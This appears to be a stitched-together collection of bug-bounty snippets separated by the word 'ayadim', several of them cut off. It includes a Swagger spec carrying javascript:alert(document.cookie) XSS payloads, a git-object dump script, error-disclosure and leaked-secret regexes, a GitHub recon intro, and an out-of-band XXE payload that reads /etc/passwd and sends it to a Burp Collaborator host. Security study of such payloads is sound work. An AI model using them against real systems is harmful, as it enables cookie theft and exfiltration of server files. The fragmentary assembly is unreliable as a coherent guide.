ayadim

swagger: "2.0",
info: 
  title: "Swagger Sample App",
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"

ayadim

#!/bin/bash
#This script will extract the content of all the objects in .git/objects
mkdir -p output
for folderName in $(ls .git/objects/);do
	for object in $(ls .git/objects/$folderName/);do
		git cat-file -p $folderName$object | tee "./output/$folderName--$object.txt"
	done
done

ayadim

((<\?php)|(<\?)|(<script language=('|")php('|")>)|(<%))	0	Source code	Low	Firm
AH[0-9]{5}:	0	Apache Server	Low	Firm
mod_[\w]+:	0	Apache Server	Low	Firm
([A-Za-z]{1,32}\.)+[A-Za-z]{0,32}\(([A-Za-z0-9]+\s+[A-Za-z0-9]+[,\s]*)*\)\s+\+{1}\d+	0	ASP.Net	Low	Certain	3
"Message":"Invalid web service call	0	ASP.Net	Low	Certain
Exception of type	0	ASP.Net	Low	Certain
--- End of inner exception stack trace ---	0	ASP.Net	Low	Certain
Microsoft OLE DB Provider	0	ASP.Net	Low	Certain
Error ([\d-]+) \([\dA-Fa-f]+\)	0	ASP.Net	Low	Certain
\bat ([a-zA-Z0-9_]*\.)*([a-zA-Z0-9_]+)\([a-zA-Z0-9, \[\]\&\;]*\)	0	ASP.Net	Low	Certain	4

ayadim

How to update the Go version

System: Debian/Ubuntu/Fedora. Might work for others as well.

1. Uninstall the exisiting version

As mentioned here, to update a go version you will first need to uninstall the original version.

To uninstall, delete the /usr/local/go directory by:

ayadim

# The Top Hacker Methodologies & Tools Notes

By [Chase](https://www.chasejensen.com).  [*](https://www.twitter.com/chasej)[*](https://www.github.com/ruevaughn)[*](https://www.linkedin.com/in/chasejensen1)
---

Hackers Notes

---

* [Jason Haddix](#1-jason-haddix)

ayadim

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

ayadim

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output

ayadim

<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://q8zbmzrowcnagrw35j5mhjmlhcn5bu.burpcollaborator.net/BLAH?%p1;'>">
%p2;

ayadim

1.0

ayadim

<item>
  <version>1.0</version>
</item>